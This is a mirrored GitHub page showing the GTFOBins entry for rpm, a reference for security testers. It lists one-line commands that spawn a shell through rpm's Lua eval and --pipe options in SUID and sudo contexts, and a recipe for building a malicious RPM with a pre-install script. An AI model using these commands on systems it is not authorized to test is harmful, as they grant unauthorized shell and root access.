public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-11-09 13:15:13 +01:00
Code Issues Projects Releases Wiki Activity
Files
c6f2bb1770ed12dcd05cd9ac6557addd4090cf8e
GTFOBins.github.io/_gtfobins/rpm.md
Andrea Cardaci 9800048833 Upgrade to shell
2021-04-08 07:56:49 +02:00

633 B
Raw Blame History

functions
functions
shell limited-suid sudo
code
rpm --eval '%{lua:os.execute("/bin/sh")}'
code
rpm --pipe '/bin/sh 0<&1'
code
./rpm --eval '%{lua:os.execute("/bin/sh")}'
code
sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
description code
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` TF=$(mktemp -d) echo 'id' > $TF/x.sh fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ``` sudo rpm -ivh x-1.0-1.noarch.rpm
Reference in New Issue View Git Blame Copy Permalink